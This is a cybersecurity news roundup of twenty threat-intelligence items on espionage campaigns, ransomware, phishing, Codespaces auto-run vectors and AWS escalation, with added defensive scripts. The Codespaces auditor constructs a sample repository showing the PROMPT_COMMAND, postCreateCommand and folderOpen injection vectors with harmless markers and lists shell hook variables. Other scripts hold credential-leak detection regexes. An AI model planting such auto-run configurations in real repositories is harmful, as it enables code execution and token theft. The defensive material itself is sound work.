This week didn’t produce one big headline. It produced many small signals — the kind that quietly shape what attacks will look like next.

Researchers tracked intrusions that start in ordinary places: developer workflows, remote tools, cloud access, identity paths, and even routine user actions. Nothing looked dramatic on the surface. That’s the point. Entry is becoming less visible while impact scales later.

Several findings also show how attackers are industrializing their work — shared infrastructure, repeatable playbooks, rented access, and affiliate-style ecosystems. Operations are no longer isolated campaigns. They run more like services.

This edition pulls those fragments together — short, precise updates that show where techniques are maturing, where exposure is widening, and what patterns are forming behind the noise.

  1. Startup espionage expansion

    In a sign that it has moved beyond government targets, the Pakistan-aligned threat actor APT36 (aka Transparent Tribe) has been observed targeting India's startup ecosystem, using ISO files and malicious LNK shortcuts with startup-themed lures to deliver Crimson RAT, enabling comprehensive surveillance, data exfiltration, and system reconnaissance. The initial access vector is a spear-phishing email carrying an ISO image. Once mounted, the ISO exposes a malicious shortcut file and a folder holding three files: a decoy document, a batch script that establishes persistence, and the final Crimson RAT payload, disguised as an executable named Excel. "Despite this expansion, the campaign remains closely aligned with Transparent Tribe's historical focus on Indian government and defense-adjacent intelligence collection, with overlap suggesting that startup-linked individuals may be targeted for their proximity to government, law enforcement, or security operations," Acronis said.

  2. Shared cybercrime infrastructure

    The threat activity cluster known as ShadowSyndicate has been linked to two additional SSH markers that connect dozens of servers to the same cybercrime operator. These hosts are then used for a wide range of malicious activities by various threat clusters linked to Cl0p, BlackCat, Ryuk, Malsmoke, and Black Basta. A notable finding is that the threat actor tends to transfer servers between their SSH clusters. ShadowSyndicate continues to be associated with toolkits including Cobalt Strike, Metasploit, Havoc, Mythic, Sliver, AsyncRAT, MeshAgent, and Brute Ratel. "The threat actor tends to reuse previously employed infrastructure, sometimes rotating various SSH keys across their servers," Group-IB said. "If such a technique is performed correctly, the infrastructure is transferred subsequently, much like in a legitimate scenario, when a server goes to a new user."
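The pivot Group-IB describes works because an SSH host key travels with the server: if the same private key is installed on several hosts, every one of them presents the same public-key fingerprint. The script below is an added example (not Group-IB's tooling) that computes the OpenSSH-style SHA256 fingerprint of public-key lines and groups hosts that share one. The hosts and keys are constructed; in practice the input would come from `ssh-keyscan` output or an internet scan.

```python
"""Cluster hosts by shared SSH host-key fingerprint (added example)."""
import base64
import hashlib
from collections import defaultdict


def openssh_fingerprint(pubkey_line: str) -> str:
    """Return the SHA256 fingerprint OpenSSH prints for a public-key line.

    OpenSSH hashes the raw (base64-decoded) key blob and base64-encodes the
    digest without '=' padding, prefixed with 'SHA256:'.
    """
    _key_type, b64_blob, *_comment = pubkey_line.split()
    blob = base64.b64decode(b64_blob)
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def cluster_by_fingerprint(scan_results):
    """Group (host, pubkey_line) pairs by fingerprint.

    A fingerprint seen on more than one host means the same private host key
    was copied between servers; that survives IP changes and re-hosting, which
    is why infrastructure handed from one operation to another can still be
    tied together.
    """
    clusters = defaultdict(list)
    for host, key_line in scan_results:
        clusters[openssh_fingerprint(key_line)].append(host)
    return {fp: sorted(hosts) for fp, hosts in clusters.items() if len(hosts) > 1}


def _fake_ed25519_key(seed: bytes) -> str:
    """Build a syntactically valid ssh-ed25519 public-key line from a seed.

    Constructed test data only: the 32-byte 'public key' is a SHA256 of the
    seed, not a real Ed25519 point. Blob layout is the SSH wire format:
    uint32 length + type string, uint32 length + key bytes.
    """
    pub = hashlib.sha256(seed).digest()
    blob = (len(b"ssh-ed25519").to_bytes(4, "big") + b"ssh-ed25519"
            + len(pub).to_bytes(4, "big") + pub)
    return "ssh-ed25519 " + base64.b64encode(blob).decode()


# Constructed scan: three hosts share key A, one host has its own key B.
KEY_A = _fake_ed25519_key(b"operator-key-A")
KEY_B = _fake_ed25519_key(b"unrelated-key-B")
SAMPLE_SCAN = [
    ("203.0.113.10", KEY_A),
    ("203.0.113.11", KEY_A),
    ("198.51.100.7", KEY_B),
    ("192.0.2.44", KEY_A),
]

if __name__ == "__main__":
    for fp, hosts in cluster_by_fingerprint(SAMPLE_SCAN).items():
        print(fp, "->", ", ".join(hosts))
```

The fingerprint string matches what `ssh-keygen -lf` prints, so results can be compared directly against threat-intel reports that publish SSH fingerprints. Rotation of keys, as Group-IB notes the actor sometimes does, breaks a single cluster into two; overlapping time windows are then needed to link them.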

  3. Ransomware KEV expansion

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) updated 59 entries in its Known Exploited Vulnerabilities (KEV) catalog in 2025 to flag them as known to be used in ransomware campaigns. The list includes 16 entries for Microsoft, six for Ivanti, five for Fortinet, three for Palo Alto Networks, and three for Zimbra. "When it flips from 'Unknown' to 'Known,' reassess, especially if you've been deprioritizing that patch because 'it's not ransomware-related yet,'" GreyNoise's Glenn Thorpe said.
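The flip Thorpe refers to is a change in the `knownRansomwareCampaignUse` field of the public KEV JSON feed. The script below is an added example (not CISA's or GreyNoise's tooling) that diffs two saved snapshots of the feed and reports every entry that changed to "Known", including entries that arrived already marked. The two snapshots are constructed with placeholder CVE identifiers; field names follow the real feed.

```python
"""Diff two snapshots of the CISA KEV feed for ransomware-use flips (added example)."""
import json


def load_snapshot(path):
    """Load a saved copy of the KEV JSON feed."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def ransomware_flips(old_feed, new_feed):
    """Return entries whose knownRansomwareCampaignUse became 'Known'.

    'Unknown' -> 'Known' is the trigger to re-prioritise a patch that was
    deferred as 'not ransomware-related yet'. Entries absent from the old
    snapshot that arrive already 'Known' are reported with previous='absent'.
    """
    old = {v["cveID"]: v for v in old_feed["vulnerabilities"]}
    flipped = []
    for v in new_feed["vulnerabilities"]:
        before = old.get(v["cveID"], {}).get("knownRansomwareCampaignUse", "absent")
        if v.get("knownRansomwareCampaignUse") == "Known" and before != "Known":
            flipped.append({
                "cveID": v["cveID"],
                "vendorProject": v["vendorProject"],
                "product": v["product"],
                "previous": before,
                "dueDate": v.get("dueDate"),
            })
    return sorted(flipped, key=lambda e: e["cveID"])


def by_vendor(flips):
    """Count flipped entries per vendor, the view used in the item above."""
    counts = {}
    for f in flips:
        counts[f["vendorProject"]] = counts.get(f["vendorProject"], 0) + 1
    return counts


# Constructed snapshots. CVE-1900-* identifiers are placeholders, not real CVEs.
OLD_FEED = {"title": "CISA Catalog of Known Exploited Vulnerabilities", "vulnerabilities": [
    {"cveID": "CVE-1900-0001", "vendorProject": "ExampleVendor", "product": "Gateway",
     "knownRansomwareCampaignUse": "Unknown", "dueDate": "2025-03-01"},
    {"cveID": "CVE-1900-0002", "vendorProject": "ExampleVendor", "product": "VPN",
     "knownRansomwareCampaignUse": "Known", "dueDate": "2025-02-14"},
    {"cveID": "CVE-1900-0003", "vendorProject": "OtherVendor", "product": "Mail",
     "knownRansomwareCampaignUse": "Unknown", "dueDate": "2025-04-10"},
]}
NEW_FEED = {"title": "CISA Catalog of Known Exploited Vulnerabilities", "vulnerabilities": [
    {"cveID": "CVE-1900-0001", "vendorProject": "ExampleVendor", "product": "Gateway",
     "knownRansomwareCampaignUse": "Known", "dueDate": "2025-03-01"},
    {"cveID": "CVE-1900-0002", "vendorProject": "ExampleVendor", "product": "VPN",
     "knownRansomwareCampaignUse": "Known", "dueDate": "2025-02-14"},
    {"cveID": "CVE-1900-0003", "vendorProject": "OtherVendor", "product": "Mail",
     "knownRansomwareCampaignUse": "Unknown", "dueDate": "2025-04-10"},
    {"cveID": "CVE-1900-0004", "vendorProject": "OtherVendor", "product": "Firewall",
     "knownRansomwareCampaignUse": "Known", "dueDate": "2025-06-30"},
]}

if __name__ == "__main__":
    for f in ransomware_flips(OLD_FEED, NEW_FEED):
        print(f"{f['cveID']} {f['vendorProject']}/{f['product']}: {f['previous']} -> Known (due {f['dueDate']})")
```

Run against yesterday's and today's copies of the feed (`load_snapshot`) from a daily job; the `dueDate` carries over unchanged when the flag flips, so the remediation deadline itself will not alert you.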

  4. Espionage and DDoS arrests

    Polish authorities have detained a 60-year-old employee of the country's defense ministry on suspicion of spying for a foreign intelligence agency. The suspect worked in the Ministry of National Defense’s strategy and planning department, including on military modernization projects, officials said. While the name of the country was not revealed, Polish state officials told local media that the suspect had worked with Russian and Belarusian intelligence services. In a related development, Poland's Central Bureau for Combating Cybercrime (CBZC) said a 20-year-old man has been arrested for allegedly conducting distributed denial-of-service (DDoS) attacks on high-profile websites, including those of strategic importance. The individual faces six charges and a potential five-year prison sentence.

  5. Codespaces RCE vectors

    Multiple attack vectors have been disclosed in GitHub Codespaces that allow remote code execution simply by opening a malicious repository or pull request. The identified vectors include: (1) .vscode/settings.json with PROMPT_COMMAND injection, (2) .devcontainer/devcontainer.json with postCreateCommand injection, and (3) .vscode/tasks.json with folderOpen auto-run tasks. "By abusing VSCode-integrated configuration files that Codespaces automatically respects, an adversary can execute arbitrary commands, exfiltrate GitHub tokens and secrets, and even abuse hidden APIs to access premium Copilot models," Orca Security researcher Roi Nisimi said. Microsoft has deemed the behavior to be by design. 
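Because Microsoft treats this as by-design behaviour, the practical control is to inspect the three files before opening an untrusted repository or pull request in Codespaces. The script below is an added example (not Orca's or Microsoft's code) that walks a checkout and reports the settings named above: shell start-up variables injected through `terminal.integrated.env.*`, devcontainer lifecycle hooks such as `postCreateCommand`, and tasks with `runOptions.runOn: "folderOpen"`. The sample repository it audits is constructed in a temporary directory with harmless marker commands.

```python
"""Flag repository config that Codespaces / VS Code will auto-execute (added example)."""
import json
import os
import re
import tempfile

# Triage heuristic: VS Code writes JSON-with-comments, so strip /* */ blocks and
# whole-line // comments (URLs inside strings are untouched) and trailing commas.
_BLOCK_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
_LINE_COMMENT_RE = re.compile(r"^\s*//[^\n]*$", re.M)
_TRAILING_COMMA_RE = re.compile(r",(\s*[}\]])")

# Shell start-up variables that execute when an integrated terminal opens.
HOOK_ENV_VARS = {"PROMPT_COMMAND", "BASH_ENV", "ENV", "ZDOTDIR", "LD_PRELOAD", "PS1"}
# devcontainer.json lifecycle hooks that run before the user types anything.
DEVCONTAINER_HOOKS = ("initializeCommand", "onCreateCommand", "updateContentCommand",
                      "postCreateCommand", "postStartCommand", "postAttachCommand")


def load_jsonc(path):
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    text = _BLOCK_COMMENT_RE.sub("", text)
    text = _LINE_COMMENT_RE.sub("", text)
    text = _TRAILING_COMMA_RE.sub(r"\1", text)
    return json.loads(text)


def audit_repo(root):
    """Return (file, setting, value) triples for anything that runs on open."""
    findings = []
    settings = os.path.join(root, ".vscode", "settings.json")
    if os.path.isfile(settings):
        for key, val in load_jsonc(settings).items():
            if key.startswith("terminal.integrated.env.") and isinstance(val, dict):
                for var, cmd in val.items():
                    if var in HOOK_ENV_VARS:
                        findings.append((".vscode/settings.json", f"{key}.{var}", str(cmd)))
    devc = os.path.join(root, ".devcontainer", "devcontainer.json")
    if os.path.isfile(devc):
        data = load_jsonc(devc)
        for hook in DEVCONTAINER_HOOKS:
            if hook in data:
                findings.append((".devcontainer/devcontainer.json", hook, str(data[hook])))
    tasks = os.path.join(root, ".vscode", "tasks.json")
    if os.path.isfile(tasks):
        for task in load_jsonc(tasks).get("tasks", []):
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append((".vscode/tasks.json", task.get("label", "<unnamed>"),
                                 str(task.get("command"))))
    return findings


def build_sample_repo():
    """Write a constructed checkout exhibiting all three vectors; returns its path.

    The commands only append markers to /tmp/hooked so the sample is harmless.
    """
    root = tempfile.mkdtemp(prefix="codespaces-audit-")
    os.makedirs(os.path.join(root, ".vscode"))
    os.makedirs(os.path.join(root, ".devcontainer"))
    files = {
        ".vscode/settings.json": """{
  // looks like harmless editor config
  "editor.tabSize": 2,
  "terminal.integrated.env.linux": {
    "PROMPT_COMMAND": "echo PROMPT_COMMAND-fired >> /tmp/hooked",
  },
}""",
        ".devcontainer/devcontainer.json": """{
  "image": "mcr.microsoft.com/devcontainers/base:ubuntu",
  "postCreateCommand": "echo postCreate-fired >> /tmp/hooked"
}""",
        ".vscode/tasks.json": """{
  "version": "2.0.0",
  "tasks": [{
    "label": "Build",
    "type": "shell",
    "command": "echo folderOpen-fired >> /tmp/hooked",
    "runOptions": {"runOn": "folderOpen"}
  }]
}""",
    }
    for rel, text in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(text)
    return root


if __name__ == "__main__":
    for path, setting, value in audit_repo(build_sample_repo()):
        print(f"{path}: {setting} = {value}")
```

Run it from a plain `git clone` on a machine that has no GitHub token before anyone opens the repository in a codespace or in VS Code with the Dev Containers extension; a finding is not necessarily malicious, but each one is a command that will execute with the developer's credentials without a prompt.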

  6. Nordic finance targeting

    The financial sector in the Nordics has been targeted by the North Korea-linked Lazarus Group as part of a long-running campaign dubbed Contagious Interview that drops a stealer and downloader named BeaverTail. "BeaverTail contains functionality that will automatically search the victim's machine for cryptocurrency-related data, but can also be used as a remote access tool for further attacks," TRUESEC said.

  7. Volunteer DDoS force

    In a new analysis, SOCRadar said the pro-Russian hacktivist outfit known as NoName057(16) is using a volunteer-distributed DDoS weapon called DDoSia Project to disrupt government, media, and institutional websites tied to Ukraine and Western political interests. Through active Telegram channels with over 20,000 followers, the group frames the disruptive (but non-destructive) attacks as "self-defense" against Western aggression and provides real-time evidence of successful disruptions. Its ideologically driven campaigns often coincide with major geopolitical events, countering sanctions and military aid announcements with retaliatory cyber attacks. "Unlike traditional botnets that compromise systems without user knowledge, DDoSia operates on a disturbing premise: thousands of willing participants knowingly install the tool and coordinate attacks against targets designated by the group's operators," SOCRadar said. "Through propaganda, gamification, and cryptocurrency rewards, NoName057(16) has built a distributed attack force that requires minimal technical skill to join, yet demonstrates remarkable operational sophistication." According to Censys, targeting of the purpose-built tool is heavily focused on Ukraine, European allies, and NATO states in government, military, transportation, public utilities, financial, and tourism sectors.

  8. Affiliate crypto drainers

    A major cybercriminal operation dubbed Rublevka Team specializes in large-scale cryptocurrency theft since its inception in 2023, generating over $10 million through affiliate-driven wallet draining campaigns. "Rublevka Team is an example of a 'traffer team,' composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages," Recorded Future said. "Unlike traditional malware-based approaches such as those used by the trafficker teams Markopolo and Crazy Evil, Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions." Rublevka Team offers affiliates access to fully automated Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. This further lowers the technical barrier to entry, allowing the threat actors to build an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight. Rublevka Team's primary Telegram channel has approximately 7,000 members to date.

  9. TLS deprecation deadline

    Microsoft is urging customers to secure their infrastructure with Transport Layer Security (TLS) version 1.2 for Azure Blob Storage, and remove dependencies on TLS version 1.0 and 1.1. "On February 3, 2026, Azure Blob Storage will stop supporting versions 1.0 and 1.1 of Transport Layer Security (TLS)," Microsoft said. "TLS 1.2 will become the new minimum TLS version. This change impacts all existing and new blob storage accounts, using TLS 1.0 and 1.1 in all clouds. Storage accounts already using TLS 1.2 aren't impacted by this change."
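The service-side change happens regardless of what a storage account is configured to accept, so the work is on the client side: find accounts whose floor is still below TLS 1.2 (a hint that legacy clients are connecting) and raise it early to surface breakage before the cut-off. The script below is an added example (not Microsoft's tooling) that consumes the JSON printed by `az storage account list -o json`, reports accounts whose `minimumTlsVersion` is below TLS1_2, and emits the `az storage account update --min-tls-version` command to fix each. The inventory is constructed; treating a missing `minimumTlsVersion` as TLS1_0 is a conservative assumption noted in the code. A probe function that attempts a handshake at a specific TLS version is included for checking clients' own endpoints; it makes a network connection and is not exercised offline.

```python
"""Audit Azure Storage accounts for a minimum TLS version below 1.2 (added example)."""
import socket
import ssl

_ORDER = {"TLS1_0": 0, "TLS1_1": 1, "TLS1_2": 2, "TLS1_3": 3}


def accounts_below(inventory, floor="TLS1_2"):
    """Return accounts whose configured minimum is below `floor`.

    Assumption (conservative): an account with no minimumTlsVersion property
    is treated as TLS1_0, the historical default for older accounts.
    """
    weak = []
    for acct in inventory:
        current = acct.get("minimumTlsVersion") or "TLS1_0"
        if _ORDER.get(current, -1) < _ORDER[floor]:
            weak.append({"name": acct["name"],
                         "resourceGroup": acct["resourceGroup"],
                         "minimumTlsVersion": current})
    return weak


def remediation(acct, floor="TLS1_2"):
    """The Azure CLI command that raises the account's TLS floor."""
    return (f"az storage account update --name {acct['name']} "
            f"--resource-group {acct['resourceGroup']} --min-tls-version {floor}")


def server_accepts(host, version, port=443, timeout=5):
    """Probe whether `host` completes a handshake at exactly `version`.

    Returns True/False, or None when the probe could not be made: the local
    OpenSSL refuses to offer that version (common for TLS 1.0/1.1 on current
    distributions) or the host is unreachable. Network call; not run offline.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    try:
        ctx.minimum_version = version
        ctx.maximum_version = version
    except (ssl.SSLError, ValueError):
        return None
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host):
                return True
    except ssl.SSLError:
        return False
    except OSError:
        return None


# Constructed inventory in the shape of `az storage account list -o json` (trimmed).
SAMPLE_INVENTORY = [
    {"name": "legacyblobs01", "resourceGroup": "rg-storage", "minimumTlsVersion": "TLS1_0"},
    {"name": "modernblobs03", "resourceGroup": "rg-storage", "minimumTlsVersion": "TLS1_2"},
    {"name": "unsetfloor02", "resourceGroup": "rg-legacy"},
]

if __name__ == "__main__":
    for acct in accounts_below(SAMPLE_INVENTORY):
        print(f"{acct['name']}: minimum is {acct['minimumTlsVersion']}")
        print("  " + remediation(acct))
```

Raising the floor to TLS1_2 now, account by account, turns the February cut-off from an outage into a controlled test: any client that breaks is one that would have broken anyway, and the account can be rolled back with the same command while the client is fixed.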

  10. Voicemail social engineering

    In a new campaign, fake voicemail notifications hosted on bank-themed subdomains direct targets to a convincing "listen to your message" page that's designed to look routine and trustworthy. In reality, the flow ends with the installation of Remotely RMM, a legitimate remote monitoring and management tool, which enrolls the victim's system into an attacker-controlled environment for persistent remote access and management. "The flow relies on social engineering rather than exploits, using lures to persuade users to approve installation steps," Censys said. "The end goal is installation of an RMM (remote monitoring and management) tool, enrolling the device into an attacker-controlled environment."

  11. Global proxy botnet

    A long-running malware operation known as SystemBC (aka Coroxy or DroxiDat) has been tied to more than 10,000 infected IP addresses globally, including systems associated with sensitive government infrastructure in Burkina Faso and Vietnam. The highest concentration of infected IP addresses has been observed in the U.S., followed by Germany, France, Singapore, and India, per Silent Push. Known to be active since at least 2019, the malware is commonly used to proxy traffic through compromised systems, to maintain persistent access to internal networks, or deploy additional malware. "SystemBC-associated infrastructure presents a sustained risk due to its role early in intrusion chains and its use across multiple threat actors," Silent Push said. "Proactive monitoring is critical, as activity tied to SystemBC is often a precursor to ransomware deployment and other follow-on abuse."

  12. Screensaver initial access

    A new spear-phishing campaign using business-themed lures has been observed luring users into running a Windows screensaver (.SCR) file that discreetly installs a legitimate RMM tool like SimpleHelp, giving attackers interactive remote control. "The delivery chain is built to evade reputation-based defenses by hiding behind trusted services," ReliaQuest said. "This reduces attacker-owned infrastructure and makes takedown and containment slower and less straightforward. SCR files are a reliable initial-access vector because they're executables that don't always receive executable-level controls. When users download and run them from email or cloud links, attackers can trigger code execution while bypassing policies tuned primarily for EXE and MSI files."
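The gap ReliaQuest describes is an extension-keyed policy: a .SCR file is an ordinary PE executable, so a rule that blocks `.exe` and `.msi` lets it through. The script below is an added example (not ReliaQuest's tooling) that classifies attachments by content instead, reading the DOS header, following `e_lfanew` to the `PE\0\0` signature and pulling the `Subsystem` field, then shows the extension-based and content-based decisions side by side. The PE bytes it tests are constructed minimal headers, not a real binary.

```python
"""Classify attachments by PE content rather than file extension (added example)."""
import os
import struct

# Extensions Windows will execute as PE images, several of which rarely get .exe-level controls.
PE_EXTENSIONS = {".exe", ".dll", ".scr", ".sys", ".cpl", ".ocx", ".com", ".pif"}
SUBSYSTEMS = {1: "native", 2: "windows_gui", 3: "windows_cui"}


def pe_info(data: bytes):
    """Return (is_pe, subsystem_name) for a byte blob.

    Layout: 'MZ' at 0, e_lfanew (uint32) at 0x3C, 'PE\\0\\0' at e_lfanew, a
    20-byte COFF header, then the optional header whose Subsystem (uint16) sits
    at offset 0x44 for both PE32 and PE32+.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False, None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 + 0x46 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False, None
    subsystem = struct.unpack_from("<H", data, e_lfanew + 24 + 0x44)[0]
    return True, SUBSYSTEMS.get(subsystem, f"unknown({subsystem})")


def policy_decisions(name, data, blocked_exts=(".exe", ".msi")):
    """Compare an extension-keyed block list with a content check on one attachment."""
    ext = os.path.splitext(name.lower())[1]
    is_pe, subsystem = pe_info(data)
    return {
        "name": name,
        "blocked_by_extension": ext in blocked_exts,
        "blocked_by_content": is_pe,
        "executable_extension": ext in PE_EXTENSIONS,
        "subsystem": subsystem,
    }


def _fake_pe(subsystem=2) -> bytes:
    """Constructed minimal PE32 header: DOS stub, COFF header, optional header only."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=i386, 1 section, SizeOfOptionalHeader=0xE0, Characteristics=EXECUTABLE_IMAGE|32BIT
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    struct.pack_into("<H", opt, 0x44, subsystem)   # Subsystem field
    return bytes(dos + coff + opt)


# Constructed attachments: a .scr lure, a genuine .exe, and a PDF.
SAMPLE_ATTACHMENTS = {
    "Q1_Business_Proposal.scr": _fake_pe(2),
    "setup.exe": _fake_pe(3),
    "brief.pdf": b"%PDF-1.7\n%constructed placeholder\n",
}

if __name__ == "__main__":
    for name, data in SAMPLE_ATTACHMENTS.items():
        print(policy_decisions(name, data))
```

The .scr lure is the row where the two decisions disagree. Mail and proxy rules should therefore key on the `MZ`/`PE` check (or on the full `PE_EXTENSIONS` set as a minimum), and endpoint policy should treat screensavers like any other executable, for example through application control rules that cover `*.scr`.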

  13. Driver abuse escalation

    Threat actors are abusing a legitimate but revoked Guidance Software (EnCase) kernel driver as part of a bring your own vulnerable driver (BYOVD) attack to elevate privileges and attempt to disarm 59 security tools. In an attack observed earlier this month, attackers leveraged compromised SonicWall SSL-VPN credentials to gain initial access to a victim network and deployed an EDR killer that abused the driver ("EnPortv.sys") to terminate security processes from kernel mode. "The attack was disrupted before ransomware deployment, but the case highlights a growing trend: threat actors weaponizing signed, legitimate drivers to blind endpoint security," Huntress researchers Anna Pham and Dray Agha said. "The EnCase driver's certificate expired in 2010 and was subsequently revoked, yet Windows still loads it, a gap in Driver Signature Enforcement that attackers continue to exploit."

  14. Ransomware crypto bug

    Security researchers have discovered a coding mistake in Nitrogen ransomware that causes it to encrypt all the files with the wrong public key, irrevocably corrupting them. "This means that even the threat actor is incapable of decrypting them, and that victims that are without viable backups have no ability to recover their ESXi encrypted servers," Coveware said. "Paying a ransom will not assist these victims, as the decryption key/ tool will not work."

  15. AI cloud escalation

    An offensive cloud operation targeting an Amazon Web Services (AWS) environment went from initial access to administrative privileges in eight minutes. The speed of the attack notwithstanding, Sysdig said the activity bears hallmarks of large language model (LLM) use to automate reconnaissance, generate malicious code, and make real-time decisions. "The threat actor gained initial access to the victim's AWS account through credentials discovered in public Simple Storage Service (S3) buckets," Sysdig said. "Then, they rapidly escalated privileges through Lambda function code injection, moved laterally across 19 unique AWS principals, abused Amazon Bedrock for LLMjacking, and launched GPU instances for model training."
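The first link in that eight-minute chain, credentials sitting in a publicly readable S3 bucket, is the one a defender can hunt for directly. The script below is an added example (not Sysdig's tooling) that scans object contents for AWS access key IDs (`AKIA` for long-lived IAM user keys, `ASIA` for temporary STS keys, each followed by 16 upper-case alphanumerics) and checks whether a 40-character secret is declared within a few lines of the hit. The objects are constructed; the credential values are the placeholders AWS uses in its own documentation, not live keys.

```python
"""Scan object contents for leaked AWS access keys (added example)."""
import re

ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
# A secret access key is 40 base64-alphabet characters; require a 'secret...key'
# label nearby so random 40-char strings are not reported on their own.
SECRET_RE = re.compile(
    r"(?i)(?:aws)?_?secret(?:_access)?_?key\W{0,4}([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])")


def mask(key_id):
    """Keep prefix and suffix so a finding can be matched without copying the key."""
    return key_id[:4] + "..." + key_id[-4:]


def scan_object(key, body, context=3):
    """Return one finding per access key ID in `body`, noting a nearby secret."""
    findings = []
    lines = body.splitlines()
    for i, line in enumerate(lines):
        for m in ACCESS_KEY_RE.finditer(line):
            window = "\n".join(lines[max(0, i - context): i + context + 1])
            findings.append({
                "object": key,
                "line": i + 1,
                "access_key_id": mask(m.group(1)),
                "key_type": "temporary (STS)" if m.group(1).startswith("ASIA") else "long-lived (IAM user)",
                "secret_nearby": SECRET_RE.search(window) is not None,
            })
    return findings


def scan_bucket(objects):
    """Scan a mapping of object key -> text body (e.g. downloaded from a bucket listing)."""
    findings = []
    for key, body in objects.items():
        findings.extend(scan_object(key, body))
    return findings


# Constructed objects. The key/secret pair is AWS's documented example credential.
SAMPLE_OBJECTS = {
    "backup/config.env": (
        "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
        "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
        "AWS_DEFAULT_REGION=us-east-1\n"
    ),
    "static/app.js": (
        "// TODO: rotate, see secrets manager\n"
        'const key = "ASIAQ4ZQX3V2EXAMPLE1";\n'
        "fetch(apiBase, { headers: { Authorization: key } });\n"
    ),
    "docs/readme.txt": "Ask the platform team for keys; never commit AKIAI-style values.\n",
}

if __name__ == "__main__":
    for f in scan_bucket(SAMPLE_OBJECTS):
        print(f)
```

A long-lived key with its secret alongside, as in the first object, is the finding to act on immediately: rotate the key and review CloudTrail for the principal. Temporary keys expire on their own but still indicate a leak path worth closing. Rather than scanning after the fact, block the condition itself with S3 Block Public Access at the account level.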

  16. Cloud phishing chain

    A phishing scheme has used emails themed around procurements and tenders to distribute PDF attachments that initiate a multi-stage attack chain to steal users' Dropbox credentials and send them to a Telegram bot. Once the credentials are transmitted, the page simulates a login attempt with a 5-second delay and then displays an "Invalid email or password" error message. "The malicious chain relies on seemingly legitimate cloud infrastructure, such as Vercel Blob storage, to host a PDF that ultimately redirects victims to a Dropbox-impersonation page designed to harvest credentials," Forcepoint said. "Because Dropbox is a familiar and trusted brand, the request for credentials appeared reasonable to the unsuspecting users. It's here that the campaign moves from deception to impact."

  17. Sandbox escape flaw

    A critical-rated security flaw in Sandboxie (CVE-2025-64721, CVSS score: 9.9) has been disclosed that, if successfully exploited, could allow sandboxed processes to execute arbitrary code as SYSTEM, fully compromising the host. The problem is rooted in a service named "SboxSvc.exe," which runs with SYSTEM permissions and functions as the "Responsible Adult" between sandboxed processes and the real computer resources. The issue has been addressed in version 1.16.7. "In this case, the reliance on manual C-style pointer arithmetic over a safe interface definition (like IDL) left a gap," depthfirst researcher Mav Levin, who discovered the vulnerability, said. "A single missing integer overflow check, coupled with implicit trust in client-provided message lengths, turned the Responsible Adult into a victim."

  18. AsyncRAT infrastructure exposed

    Attack surface management platform Censys said it's tracking 57 active AsyncRAT-associated hosts exposed on the public internet as of January 2026. First released in 2019, AsyncRAT enables long-term unauthorized access and post-compromise control, making it a reliable tool for credential theft, lateral movement staging, and follow-on payload delivery. Out of the 57 total assets, the majority are hosted on APIVERSA (13% of hosts), Contabo networks (11% combined), and AS-COLOCROSSING (5.5%), indicating operators prioritize low-cost, abuse-tolerant hosting over major cloud providers. "These hosts are primarily concentrated within a small number of VPS-focused autonomous systems and frequently reuse a distinctive self-signed TLS certificate identifying the service as an 'AsyncRAT Server,' enabling scalable discovery of related infrastructure beyond sample-based detection," Censys said.

  19. Typhoon tradecraft overlap

    An analysis of various campaigns mounted by Chinese hacking groups Violet Typhoon and Volt Typhoon has revealed the use of some common tactics: exploiting zero-day flaws in edge devices, living-off-the-land (LotL) techniques to traverse networks and hide within normal network activity, and Operational Relay Box (ORB) networks to conceal espionage operations. "Not only will Chinese nation-state threat actors almost certainly continue to pursue high-value targets, but it is probable they will scale up their operations to conduct global campaigns and target as many entities in each region or sector as possible to maximize their gains at every exploitation," Intel471 said. "The acceleration of improvements in the cybersecurity posture of numerous key targeted countries has compelled Chinese state-sponsored intelligence forces to become more innovative with their attack strategies."

  20. ClickFix distribution surge

    Threat actors are using a framework named IClickFix that can be used to build ClickFix pages on hacked WordPress sites. According to security firm Sekoia, the framework has been live on more than 3,800 sites since December 2024. "This cluster uses a malicious JavaScript framework injected into compromised WordPress sites to display the ClickFix lure and deliver NetSupport RAT," the French cybersecurity company said. The malware distribution campaign leverages the ClickFix social engineering tactic through a Traffic Distribution System (TDS). It's suspected that the attacker abuses the open-source URL shortener YOURLS as the TDS. In recent months, threat actors have also been found using another TDS called ErrTraffic to inject malicious JavaScript in compromised websites so as to cause them to glitch and then suggest a fix to address the non-existent problem.
